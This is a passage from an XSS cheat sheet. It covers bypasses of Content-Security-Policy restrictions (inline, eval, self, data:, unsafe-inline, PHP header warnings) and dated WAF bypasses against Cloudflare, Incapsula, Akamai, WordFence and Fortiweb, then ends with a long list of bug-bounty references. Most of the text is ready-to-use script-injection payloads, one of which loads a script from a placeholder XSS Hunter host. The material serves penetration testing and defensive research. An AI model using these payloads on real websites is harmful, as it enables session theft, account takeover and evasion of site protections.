Source: [lab.wallarm.com](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)
### Bypass CSP inline eval
**Requirements**:
* CSP `inline` or `eval`
**Payload**:
```js
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
```
Source: [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
### Bypass CSP script-src self
**Requirements**:
* CSP like `script-src self`
**Payload**:
```js
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
```
Source: [@akita_zen](https://twitter.com/akita_zen)
### Bypass CSP script-src data
**Requirements**:
* CSP like `script-src 'self' data:` as warned about in the official [mozilla documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src).
**Payload**:
```javascript
<script src="data:,alert(1)">/</script>
```
Source: [@404death](https://twitter.com/404death/status/1191222237782659072)
### Bypass CSP unsafe-inline
**Requirements**:
* CSP: `script-src https://google.com 'unsafe-inline';`
**Payload**:
```javascript
"/><script>alert(1);</script>
```
### Bypass CSP header sent by PHP
**Requirements**:
* CSP sent by PHP `header()` function
**Payload**:
In the default `php:apache` image configuration, PHP cannot modify headers once the response body has already been written. This happens when a warning is raised by the PHP engine and displayed, because the warning text is sent to the client before the `header()` call runs.
Here are several ways to generate a warning:
- 1000 $_GET parameters
- 1000 $_POST parameters
- 20 $_FILES
If warnings are configured to be displayed, you should get these:
* **Warning**: `PHP Request Startup: Input variables exceeded 1000. To increase the limit change max_input_vars in php.ini. in Unknown on line 0`
* **Warning**: `Cannot modify header information - headers already sent in /var/www/html/index.php on line 2`
```http
GET /?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a&a&a&a
```
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
## Common WAF Bypass
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
#### 25th January 2021
```html
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
```
#### 21st April 2020
```html
<svg/OnLoad="`${prompt``}`">
```
#### 22nd August 2019
```html
<svg/onload=%26nbsp;alert`bohdan`+
```
#### 5th June 2019
```html
1'"><img/src/onerror=.1|alert``>
```
#### 3rd June 2019
```html
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
```
### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)
```html
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
```
### Cloudflare XSS Bypass - 27th February 2018
```html
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
```
### Chrome Auditor - 9th August 2018
```javascript
</script><svg><script>alert(1)-%26apos%3B
```
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018
```javascript
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019
```html
<svg onload\r\n=$.globalEval("al"+"ert()");>
```
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018
```html
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
```
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018
```javascript
<a href=javas&#99;ript:alert(1)>
```
### Fortiweb WAF Bypass by [@rezaduty](https://twitter.com/rezaduty) - 9th July 2019
```javascript
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
```
## Labs
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
## References
- [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot)
- tbm
- [(Relative Path Overwrite) RPO XSS - Infinite Security](http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html)
- [RPO TheSpanner](http://www.thespanner.co.uk/2014/03/21/rpo/)
- [RPO Gadget - innerthmtl](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/)
- [Relative Path Overwrite - Detectify](https://support.detectify.com/support/solutions/articles/48001048955-relative-path-overwrite)
- [XSS ghettoBypass - d3adend](http://d3adend.org/xss/ghettoBypass)
- [XSS without HTML: Client-Side Template Injection with AngularJS](http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html)
- [XSSING WEB PART - 2 - Rakesh Mane](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
- [Making an XSS triggered by CSP bypass on Twitter. @tbmnull](https://www.buaq.net/go-25883.html)
- [Ways to alert(document.domain) - @tomnomnom](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
- [D1T1 - Michele Spagnuolo and Lukas Wilschelbaum - So We Broke All CSPs](https://conference.hitb.org/hitbsecconf2017ams/materials/D1T1%20-%20Michele%20Spagnuolo%20and%20Lukas%20Wilschelbaum%20-%20So%20We%20Broke%20All%20CSPS.pdf)
- [Sleeping stored Google XSS Awakens a $5000 Bounty](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by Patrik Fehrenbach
- [RPO that lead to information leakage in Google](https://web.archive.org/web/20220521125028/https://blog.innerht.ml/rpo-gadgets/) by filedescriptor
- [God-like XSS, Log-in, Log-out, Log-in](https://whitton.io/articles/uber-turning-self-xss-into-good-xss/) in Uber by Jack Whitton
- [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager
- [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen
- [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
- [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
- [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
- [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek
- [Command Injection in Google Console](http://www.pranav-venkat.com/2016/03/command-injection-which-got-me-6000.html) by Venkat S
- [Facebook's Moves - OAuth XSS](http://www.paulosyibelo.com/2015/12/facebooks-moves-oauth-xss.html) by PAULOS YIBELO
- [Stored XSS on developer.uber.com via admin account compromise in Uber](https://hackerone.com/reports/152067) by James Kettle (albinowax)
- [Yahoo Mail stored XSS](https://klikki.fi/adv/yahoo.html) by Klikki Oy
- [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa
- [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen
- [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz
- [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify
- [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html)
- [Microsoft XSS and Twitter XSS](https://wesecureapp.com/blog/xss-by-tossing-cookies/)
- [Flash XSS mega nz](https://labs.detectify.com/2013/02/14/how-i-got-the-bug-bounty-for-mega-co-nz-xss/) - by frans
- [xss in google IE, Host Header Reflection](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
- [Years ago Google xss](http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf)
- [xss in google by IE weird behavior](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
- [xss in Yahoo Fantasy Sport](https://web.archive.org/web/20161228182923/http://dawgyg.com/2016/12/07/stored-xss-affecting-all-fantasy-sports-fantasysports-yahoo-com-2/)
- [xss in Yahoo Mail Again, worth $10000](https://klikki.fi/adv/yahoo2.html) by Klikki Oy
- [Sleeping XSS in Google](https://blog.it-securityguard.com/bugbounty-sleeping-stored-google-xss-awakens-a-5000-bounty/) by securityguard
- [Decoding a .htpasswd to earn a payload of money](https://blog.it-securityguard.com/bugbounty-decoding-a-%F0%9F%98%B1-00000-htpasswd-bounty/) by securityguard
- [Google Account Takeover](http://www.orenh.com/2013/11/google-account-recovery-vulnerability.html#comment-form)
- [AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2](http://www.geekboy.ninja/blog/airbnb-bug-bounty-turning-self-xss-into-good-xss-2/) by geekboy
- [Uber Self XSS to Global XSS](https://httpsonly.blogspot.hk/2016/08/turning-self-xss-into-good-xss-v2.html)
- [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin Moulinier
- [Airbnb When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett
- [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)
- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
- [postMessage XSS Bypass](https://hackerone.com/reports/231053)
- [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
- [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
- [XSS due to improper regex in third party js Uber 7k XSS](http://zhchbin.github.io/2016/09/10/A-Valuable-XSS/)
- [XSS in TinyMCE 2.4.0](https://hackerone.com/reports/262230) by Jelmer de Hen
- [Pass uncoded URL in IE11 to cause XSS](https://hackerone.com/reports/150179)
- [Twitter XSS by stopping redirection and javascript scheme](http://blog.blackfan.ru/2017/09/devtwittercom-xss.html) by Sergey Bobrov
- [Auth DOM Uber XSS](http://stamone-bug-bounty.blogspot.hk/2017/10/dom-xss-auth_14.html)
- [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be)
- [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
- [Bypass < with ＜](https://hackerone.com/reports/639684)
- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
- [Secret Web Hacking Knowledge: CTF Authors Hate These Simple Tricks - Philippe Dourassov - 13 may 2024](https://youtu.be/Sm4G6cAHjWM)